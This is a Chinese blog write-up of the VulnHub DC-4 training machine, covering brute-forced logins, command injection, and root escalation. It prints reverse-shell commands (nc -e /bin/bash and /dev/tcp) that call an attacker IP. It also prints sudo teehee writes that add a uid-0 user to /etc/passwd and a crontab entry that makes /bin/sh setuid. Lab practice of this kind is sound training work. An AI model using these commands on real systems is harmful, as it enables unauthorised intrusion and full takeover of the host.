VulnHub DC4

最新推荐文章于 2024-07-30 21:21:24 发布
最新推荐文章于 2024-07-30 21:21:24 发布
阅读量352 收藏
点赞数
分类专栏: # VulnHub Writeup 文章标签: VulbHub DC4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014029795/article/details/116937847
版权

0x00 靶机环境

下载地址1:https://www.vulnhub.com/entry/dc-4,313/

下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz
在这里插入图片描述
只有一个flag,但是给了多个切入点。
在这里插入图片描述
开肝。

0x01 渗透流程

nmap走起
在这里插入图片描述
服务端口继续扫
在这里插入图片描述
这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。
在这里插入图片描述
只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找不到特别有用的信息,无奈只能上大招了,同时对sshhttp进行猜解。

http猜解时使用的用户名是四个system,root,admin,administrator,密码则是使用burpsuite中的默认字典
在这里插入图片描述
感觉跑了不少出来,但是实际是只有第一个admin/happy是行的。
在这里插入图片描述
SSH则失败了,不过已经有切入点了,这个先放放,登陆后看后台是啥样
在这里插入图片描述
后台管理功能,感觉是命令执行啊,查看表单参数
在这里插入图片描述
啊哈,直接传命令的,那么就尝试下命令执行。
在这里插入图片描述
真有,那就反弹shell
在这里插入图片描述
kali上接shell
在这里插入图片描述
这里有点尴尬,接不上,没想明白为啥。
在这里插入图片描述
没办法只能换了,试了下有nc,直接用ncnc -e /bin/bash 192.168.181.141 12345
在这里插入图片描述
走起,接shell
在这里插入图片描述
python改善下shell环境python -c 'import pty;pty.spawn("/bin/bash")',查看版本信息
在这里插入图片描述
准备提权,先查看suid提权文件find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
有两个熟悉的文件,sudo -l先走
在这里插入图片描述
需要密码,那再看/home/jim/test.sh
在这里插入图片描述
让咱好好学bash呢,这脚本有权限的话,是可以用来提权的。
在这里插入图片描述
谁都能执行,GO,先测试下whoami
在这里插入图片描述
提权失败?没明白,再看一次发现。。
在这里插入图片描述
没有suid了,这么神奇的吗,绝了。这到底发生了什么。。。

不过发现了一个backups的目录,还有一个mbox疑似邮件箱的文件,不过这个mbox没有权限查看,只能先看目录了,能拿到jim权限就还可以
在这里插入图片描述
有个备份文件,似乎是历史密码本
在这里插入图片描述
用来猜解之前失败的ssh,用户名直接使用jim,再来一次
在这里插入图片描述
来了jim/jibril04ssh上去看文件。
在这里插入图片描述
啥都没啊,白瞎,继续提权
在这里插入图片描述
这里也什么都没有,再翻翻邮箱。。。
在这里插入图片描述
有惊喜,又得到一个用户,尝试走一波
在这里插入图片描述
成功登陆,第三次尝试提权。。。。
在这里插入图片描述
又是sudo,再看
在这里插入图片描述
终于有东西了。teehee --help查看下用法,感觉和tee差不多
在这里插入图片描述
单纯的管道命令,但是这里有root权限,可以写/etc/passwd,增加uid0的用户,
在这里插入图片描述
不行,这里有点小坑,sudo要放在teehee前,而不是在语句前,再来一次
echo "test:x:0:0::/root:/bin/bash"|sudo teehee -a /etc/passwd
在这里插入图片描述
增加成功,但是这里登陆不上,仍然需要密码,同时尝试过去掉中间的x即密码点位符,同样也是登陆失败,使用su切换用户也是不行的。

那就只能考虑利用teehee写配置文件了,这里利用写crontab文件

echo "* * * * * root chmod 4777 /bin/sh" |sudo teehee -a /etc/crontab

成功提权
在这里插入图片描述
怎么感觉这么套娃呢。。

0x02 总结

这是还是有点坑,几个点,一个个的来总结。

第一个坑

为啥使用bash -i >& /dev/tcp/192.168.181.141/12345 1>&2反弹shell不成功?

想不明白!!!

第二个坑

首先是那个suid消失的test.sh,重新开了一次环境,测试发现,一改内容suid就没了
在这里插入图片描述
我在kali中测试结果如下,如果是root修改文件内容,suid不消失,修改属主,suid才会消失。但是如果是普通用户修改文件内容suid会消失的。

那这个地方提权,可以用charles使用teehee增加test.sh文件内容
在这里插入图片描述
增加文件内容后,suid还在
在这里插入图片描述
但是结果还是失败了,感觉是suid的理解不太好。果然被作者教育了,需要好好学shell。。。

后来仔细想了下这里为什么不能利用的原因,因为suid是在运行中权限变为owner的权限,这里的test.shownerjim,自然也是以jim的身份运行,并不是有suid就是root身份,当然的提权失败,知识确实学的不牢固,现在理解深刻多了。

第三个坑

admin无密码管理员用户失败的原因确实没发现为什么,但是我后来测试,用jim账户就可以成功,用charles账号则需要密码。。。

echo "admin::0:0::/root:/bin/bash"|sudo teehee -a /etc/passwd

charles失败
在这里插入图片描述
jim成功
在这里插入图片描述
不晓得是不是我把环境玩坏了的原因。重新开环境后,证实确实是环境被玩坏了。
在这里插入图片描述
没想起来是哪出问题了,算了,就这样。

baynk
关注
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4672
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1219
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机渗透之DC4
最新发布
2301_77039831的博客
07-30 773
‌在某些情况下,‌如果当前用户具有对某个文件的写权限,‌并且可以通过sudo命令以root权限运行tee命令,‌那么就可以利用这个特性来修改系统文件,‌从而实现提权。由于获取shell终端的用户是www用户,权限非常低,所以我们先看看都有什么东西,首先先看看都有哪些用户。发现数据跟预想的一样,命令是明文传输的,这时候我们就可以修改radio传递的参数来实现命令执行。发现是一个密码本,应该是jim用户的密码,保存到kali,然后用hydra爆破试一下。登录发现是查看磁盘文件的页面,于是试试命令执行漏洞。
VulnHub系列】DC4
大方子
04-09 697
https://note.youdao.com/s/FdSgf6NE
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 411
Vulnhub靶机:DC-4渗透详细过程
Vulnhub渗透靶机系列----DC4
m0_67284865的博客
08-18 126
vulnhub详细步骤解析,Vulnhub渗透靶机系列----DC4
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1965
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
vulnhub靶机实战_DC-4
Varin
06-05 844
【代码】vulnhub靶机实战_DC-4。
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1784
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
dc-4 靶机渗透学习
..
03-19 3157
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
vulnhub-dc4
bqnagus
10-05 1181
vulnhub-dc4靶机复现
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1562
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
vulnhub靶机渗透DC-4
RestoreJustice的博客
03-17 180
密码错误为:499字节大小的包)192.168.80.132 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.132。下载地址:https://www.vulnhub.com/entry/dc-4,313/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值